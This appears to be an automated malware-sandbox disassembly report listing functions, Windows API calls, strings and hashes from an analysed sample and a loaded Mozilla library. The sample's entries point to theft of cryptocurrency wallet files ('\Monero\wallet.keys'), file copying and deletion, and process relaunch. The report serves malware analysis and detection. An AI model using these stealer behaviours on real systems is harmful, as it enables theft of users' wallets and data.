Opcode ID: 8339ba12af37fa26f05abf08bcdca36a2b1a18870f556c9d9646214c8965c191
Instruction ID: 7ef7d4a13a85d17d7e98213f2110356853696a9c2d53dc52faa0f9c4c09cd11d
Opcode Fuzzy Hash: 8339ba12af37fa26f05abf08bcdca36a2b1a18870f556c9d9646214c8965c191
Instruction Fuzzy Hash: F9F080B138079523D62415A65D05B6A275DA7C1B65F34813FF205FF9C0DF50E90086DF

Function 6C5AD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C5BCBE8: GetCurrentProcess.KERNEL32(?,6C5831A7), ref: 6C5BCBF1
Part of subcall function 6C5BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5831A7), ref: 6C5BCBFA

EnterCriticalSection.KERNEL32(6C60E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5BD1C5), ref: 6C5AD4F2
LeaveCriticalSection.KERNEL32(6C60E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5BD1C5), ref: 6C5AD50B

Part of subcall function 6C58CFE0: EnterCriticalSection.KERNEL32(6C60E784), ref: 6C58CFF6
Part of subcall function 6C58CFE0: LeaveCriticalSection.KERNEL32(6C60E784), ref: 6C58D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5BD1C5), ref: 6C5AD52E
EnterCriticalSection.KERNEL32(6C60E7DC), ref: 6C5AD690
LeaveCriticalSection.KERNEL32(6C60E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5BD1C5), ref: 6C5AD751

Strings

MOZ_CRASH(), xrefs: 6C5AD4BB

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: c4f5baf05ea84c93619d7257bf5e78ca8b8fea4e83fa06153431d5a1b8676ec4
Instruction ID: 596529b10b6a94f379a172fe87b67fa8e994a52510e08cd8bc0a902bec31525e
Opcode Fuzzy Hash: c4f5baf05ea84c93619d7257bf5e78ca8b8fea4e83fa06153431d5a1b8676ec4
Instruction Fuzzy Hash: 60510071B047018FD318DF6AC99071ABBF1FB89704F20892ED99AD7B81D770A801CB96

Function 003DC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 003DC8EC
___crtLCMapStringA.LIBCMT ref: 003DC90C
___crtLCMapStringA.LIBCMT ref: 003DC931

Strings

, xrefs: 003DC896

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 0136812193893c0850f589c99486649262878f5d3c63d1faca0b7a70fd2d78a0
Instruction ID: 7be103b01da30cdfd8d60fccec9028485a88c20576f75c4a2ebbcd4742491bca
Opcode Fuzzy Hash: 0136812193893c0850f589c99486649262878f5d3c63d1faca0b7a70fd2d78a0
Instruction Fuzzy Hash: B14128B252079D5EDB238B249D94FFBBBEC9F05304F1454E9E58A86282D3719A44DF20

Function 6C5DB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C584290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C5C3EBD,6C5C3EBD,00000000), ref: 6C5842A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C5DB127), ref: 6C5DB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5DB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C5DB4E4

Strings

pid:, xrefs: 6C5DB4DE

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 9487d19b618c6e3ac3a3c7912e0633541b7fad223c1328f9ae9766594e4d28a2
Instruction ID: 795dde6d81e652cf3cb234626fcb02fbde8b0997f5e0b9291134c7a954fe16da
Opcode Fuzzy Hash: 9487d19b618c6e3ac3a3c7912e0633541b7fad223c1328f9ae9766594e4d28a2
Instruction Fuzzy Hash: 5331F131A01308DBDB00EFA9DC80AAEB7B7BF49319F550529D80267A41E731F945CBA5

Function 003D6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 003D6663

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

ShellExecuteEx.SHELL32(0000003C), ref: 003D6726
ExitProcess.KERNEL32 ref: 003D6755

Strings

<, xrefs: 003D66D9

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 4b861d1bb1dd33709757a7e1a050ee5146ceea405d6e505867a476961e8a00c0
Instruction ID: 503cb1675ab0621aef7335eeba9c84523a0a11aac7251aa690e445de03949339
Opcode Fuzzy Hash: 4b861d1bb1dd33709757a7e1a050ee5146ceea405d6e505867a476961e8a00c0
Instruction Fuzzy Hash: C13141B2C01218ABDB16EB90ED91FDE7778AF44300F40519AF3096A291DF746B49CF5A

Function 003D87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003E0E28,00000000,?), ref: 003D882F
RtlAllocateHeap.NTDLL(00000000), ref: 003D8836
wsprintfA.USER32 ref: 003D8850

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Strings

%dx%d, xrefs: 003D8847

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: 05f3d94a882fa6d6c50a3ec62e940f48f9e3b9e738a0d2ca2fcae2b01a03a349
Instruction ID: ce212970b917cdd7e9d9d9c8ae4a97694cd9b5408daf95854698009721c3fc60
Opcode Fuzzy Hash: 05f3d94a882fa6d6c50a3ec62e940f48f9e3b9e738a0d2ca2fcae2b01a03a349
Instruction Fuzzy Hash: 2C21EDB2A80308ABDB04DFD4DD45FAEBBB9FB48751F104519F605A7280C779A901CBA1

Function 6C5CE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C5CE577
AcquireSRWLockExclusive.KERNEL32(6C60F4B8), ref: 6C5CE584
ReleaseSRWLockExclusive.KERNEL32(6C60F4B8), ref: 6C5CE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C5CE8A6

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C5CE5A1, 6C5CE5CC, 6C5CE5FF, 6C5CE62A
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C5CE777
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C5CE826, 6C5CE850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C5CE655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C5CE722, 6C5CE750, 6C5CE7A2

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 108d62e72fac37e590e4ea51c8410614ea124f29ffda6b0badab40d4bee4737a
Instruction ID: 068bba15e4e842489a341a1f9c94f87158545f3649a86ccff93175f3b9c8a810
Opcode Fuzzy Hash: 108d62e72fac37e590e4ea51c8410614ea124f29ffda6b0badab40d4bee4737a
Instruction Fuzzy Hash: F5118E32704254DFCB009F56CA89A69BBB4FFC9368F00061DE85567651D7B0A805CBDE

Function 003D8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003D951E,00000000), ref: 003D8D5B
RtlAllocateHeap.NTDLL(00000000), ref: 003D8D62
wsprintfW.USER32 ref: 003D8D78

Strings

%hs, xrefs: 003D8D6F

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 673ff3930d65d1d91e14085a8abb93644796d836cd3cc5984385430865aa8434
Instruction ID: e5eebdb101a79f1ec653b75469056905f24362f70c6b2ea2aa26a14d45835fce
Opcode Fuzzy Hash: 673ff3930d65d1d91e14085a8abb93644796d836cd3cc5984385430865aa8434
Instruction Fuzzy Hash: D8E0ECB5A80308BBD714DBE4DD0AE6A77B9EB44742F008598FD0A97280DA719E109B96

Function 6C5D0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C5D0CD5

Part of subcall function 6C5BF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C5BF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C5D0D40
free.MOZGLUE ref: 6C5D0DCB

Part of subcall function 6C5A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5A5EDB
Part of subcall function 6C5A5E90: memset.VCRUNTIME140(ew^l,000000E5,?), ref: 6C5A5F27
Part of subcall function 6C5A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5A5FB2

free.MOZGLUE ref: 6C5D0DDD
free.MOZGLUE ref: 6C5D0DF2

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 974e8e7c63ac3c7c90cf0506be54b96e884db850bac8c5b18744afbbb6bedd01
Instruction ID: f1708e530292af48192a784372b7184fba8ffdddab88fe579737485706fbc9c0
Opcode Fuzzy Hash: 974e8e7c63ac3c7c90cf0506be54b96e884db850bac8c5b18744afbbb6bedd01
Instruction Fuzzy Hash: E0410375A08780CBD720DF29C88079AFBE5BFC9614F518A2EA8D887750D770A845CB92

Function 6C5DCCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C5CDA31,00100000,?,?,00000000,?), ref: 6C5DCDA4

Part of subcall function 6C59CA10: malloc.MOZGLUE(?), ref: 6C59CA26

Part of subcall function 6C5DD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C5DCDBA,00100000,?,00000000,?,6C5CDA31,00100000,?,?,00000000,?), ref: 6C5DD158
Part of subcall function 6C5DD130: InitializeConditionVariable.KERNEL32(00000098,?,6C5DCDBA,00100000,?,00000000,?,6C5CDA31,00100000,?,?,00000000,?), ref: 6C5DD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C5CDA31,00100000,?,?,00000000,?), ref: 6C5DCDC4

Part of subcall function 6C5D7480: ReleaseSRWLockExclusive.KERNEL32(?,6C5E15FC,?,?,?,?,6C5E15FC,?), ref: 6C5D74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C5CDA31,00100000,?,?,00000000,?), ref: 6C5DCECC

Part of subcall function 6C59CA10: mozalloc_abort.MOZGLUE(?), ref: 6C59CAA2

Part of subcall function 6C5CCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C5DCEEA,?,?,?,?,00000000,?,6C5CDA31,00100000,?,?,00000000), ref: 6C5CCB57
Part of subcall function 6C5CCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C5CCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C5DCEEA,?,?), ref: 6C5CCBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C5CDA31,00100000,?,?,00000000,?), ref: 6C5DD058

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: cd11a0dc6f02089b9dc16687f10d70dff45812b7f5c59ea6293ee20cdcb9dd97
Instruction ID: 4ebc77477d5736c408127965cc19d08901cd36e3ac691912fd3f1060fc6eb475
Opcode Fuzzy Hash: cd11a0dc6f02089b9dc16687f10d70dff45812b7f5c59ea6293ee20cdcb9dd97
Instruction Fuzzy Hash: 0ED16E71A04B46DFD708CF2CC980B99B7E1BF89308F01866DD85987752EB31B965CB85

Function 003CD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D8B60: GetSystemTime.KERNEL32(003E0E1A,00E6B6C8,003E05AE,?,?,003C13F9,?,0000001A,003E0E1A,00000000,?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003D8B86

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003CD481
lstrlen.KERNEL32(00000000), ref: 003CD698
lstrlen.KERNEL32(00000000), ref: 003CD6AC
DeleteFileA.KERNEL32(00000000), ref: 003CD72B

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
